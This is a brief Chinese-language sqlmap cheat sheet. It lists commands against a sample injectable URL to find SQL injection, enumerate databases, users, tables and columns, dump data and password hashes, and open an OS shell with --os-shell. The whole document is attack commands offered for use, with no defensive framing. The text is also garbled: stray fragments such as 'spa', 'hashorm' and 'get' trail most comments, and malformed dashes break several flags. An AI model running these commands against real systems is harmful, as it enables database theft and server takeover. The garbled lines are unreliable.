列幾個基本命令sql
./sqlmap.py –h //查看幫助信息shell
./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 //get注入數據庫
./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 --data 「DATA」//post注入cookie
./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 --cookie 「COOKIE」//修改請求時的cookiepost
./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 --dbs //列數據庫spa
./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-users //列用戶.net
./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-passwords //獲取密碼hashorm
./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-tables -D DB_NAME //列DB_NAME的表get
./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-columns –T TB_NAME -D DB_NAME //讀取TB_NAME中的列hash
./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //讀字段C1,C2,C3數據
./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-os-shell //取得一個shell